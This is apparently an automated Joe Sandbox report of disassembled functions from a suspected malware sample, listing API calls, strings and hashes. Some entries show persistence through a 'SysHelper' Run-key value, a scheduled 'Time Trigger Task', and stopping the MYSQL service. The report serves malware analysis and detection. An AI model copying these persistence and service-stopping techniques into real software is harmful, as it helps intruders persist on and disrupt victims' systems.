                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strncmp
                                                                                                                                                                                                                                        • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                                                                                                                                                        • API String ID: 909875538-2733969777
                                                                                                                                                                                                                                        • Opcode ID: 3bad3cb084291eb1c2bbc43ba19b1b46a9bd959c97fa9acc6cc8540940d610f6
                                                                                                                                                                                                                                        • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bad3cb084291eb1c2bbc43ba19b1b46a9bd959c97fa9acc6cc8540940d610f6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1503006713-0
                                                                                                                                                                                                                                        • Opcode ID: 006bfa9036a5487fa5e659dc939274a1e485e21b3a0578db8bc342fd26765a9b
                                                                                                                                                                                                                                        • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 006bfa9036a5487fa5e659dc939274a1e485e21b3a0578db8bc342fd26765a9b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00427B21 Relevance: 18.1, APIs: 12, Instructions: 84COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • DecodePointer.KERNEL32 ref: 00427B29
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427B42
                                                                                                                                                                                                                                          • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042500D,?,00423F7C,?,0041E6CC,00000000), ref: 00420C01
                                                                                                                                                                                                                                          • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042500D,?,00423F7C,?,0041E6CC,00000000,?,?,?,?,?,004CB3EC), ref: 00420C13
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427B55
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427B73
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427B85
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427B96
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427BA1
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427BC5
                                                                                                                                                                                                                                        • EncodePointer.KERNEL32(005A5388), ref: 00427BCC
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427BE1
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427BF7
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427C1F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3064303923-0
                                                                                                                                                                                                                                        • Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                                                                                                                                                                                                                                        • Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00411B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00411BB0
                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00411BD0
                                                                                                                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                                                                                                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?), ref: 00411C44
                                                                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                                                                                                                                                        • String ID: \shell32.dll
                                                                                                                                                                                                                                        • API String ID: 679253221-3783449302
                                                                                                                                                                                                                                        • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                                                                                                                                                        • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00454B72), ref: 004549C7
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 004549FB
                                                                                                                                                                                                                                        • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                                                                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                                                                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00454A8A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                                                                                                        • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                                                                                                                                        • API String ID: 2112994598-1672312481
                                                                                                                                                                                                                                        • Opcode ID: 18e042caf2cd4394db39376461ab0cc8a32a9e3f5bb981467ad6ca9449a93adc
                                                                                                                                                                                                                                        • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 18e042caf2cd4394db39376461ab0cc8a32a9e3f5bb981467ad6ca9449a93adc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00454AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                                                                                                                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00454B05
                                                                                                                                                                                                                                        • __vfwprintf_p.LIBCMT ref: 00454B27
                                                                                                                                                                                                                                          • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                                                                                                                                                                                                                                        • vswprintf.LIBCMT ref: 00454B5D
                                                                                                                                                                                                                                        • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                                                                                                                                                                                                                                        • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                                                                                                                                                                                                                                        • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                                                                                                                                                                                                                                        • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                                                                                                                                                        • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                                                                                                                                                        • API String ID: 277090408-1348657634
                                                                                                                                                                                                                                        • Opcode ID: 09c5ffbe004322fb5edb75d7b08a589fa05082c23f97f4e858192e99806d6cdf
                                                                                                                                                                                                                                        • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09c5ffbe004322fb5edb75d7b08a589fa05082c23f97f4e858192e99806d6cdf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00412360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 004123B6
                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                                                                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 004123F4
                                                                                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                                                                                                                                                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • SysHelper, xrefs: 004123D6
                                                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                                                                                                                                                        • API String ID: 122392481-4165002228
                                                                                                                                                                                                                                        • Opcode ID: a51db735698a41f0a495beb9b07ff69d7eeed6e408a0830d11e0f70f94ed0358
                                                                                                                                                                                                                                        • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a51db735698a41f0a495beb9b07ff69d7eeed6e408a0830d11e0f70f94ed0358
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00425B6E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1077091919-0
                                                                                                                                                                                                                                        • Opcode ID: ac3d283600512a096245aeca8b781c3adabf0a7b47fdeef014d80140aa85ea25
                                                                                                                                                                                                                                        • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac3d283600512a096245aeca8b781c3adabf0a7b47fdeef014d80140aa85ea25
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00418000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                                                                                        • Opcode ID: 2365dba272ac9ef843ec83cad67e28dc9e178db43af24e503ab63c731e201ecd
                                                                                                                                                                                                                                        • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2365dba272ac9ef843ec83cad67e28dc9e178db43af24e503ab63c731e201ecd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0040DAEB
                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
                                                                                                                                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0040DC38
                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 0040DC92
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                                                                                                                                                        • String ID: --Task$Comment$Time Trigger Task
                                                                                                                                                                                                                                        • API String ID: 330603062-1376107329
                                                                                                                                                                                                                                        • Opcode ID: c5fadb80c971dad2caa9d7f95957ff1f1a43d7a7d51cba69068291a801761176
                                                                                                                                                                                                                                        • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5fadb80c971dad2caa9d7f95957ff1f1a43d7a7d51cba69068291a801761176
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00411A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                                                                                                                                                                                                                                        • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                                                                                                                                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                                                                                                                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                                                                                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 00411A75
                                                                                                                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                                                                                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                                                                                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                                                                                                                                                        • String ID: MYSQL
                                                                                                                                                                                                                                        • API String ID: 2359367111-1651825290
                                                                                                                                                                                                                                        • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                                                                                                                                                        • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0044F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 0044F27F
                                                                                                                                                                                                                                          • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0044F294
                                                                                                                                                                                                                                          • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F26B,?,?,00000000,?,?,?,?,0044F26B,?,005081FC,?), ref: 00430F1F
                                                                                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 0044F2AD
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                                                                                                                                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                                                                                                                                                                                                                          • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                                                                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 0044F2FB
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0044F310
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                                                                                                                                                        • String ID: bad function call
                                                                                                                                                                                                                                        • API String ID: 2464034642-3612616537
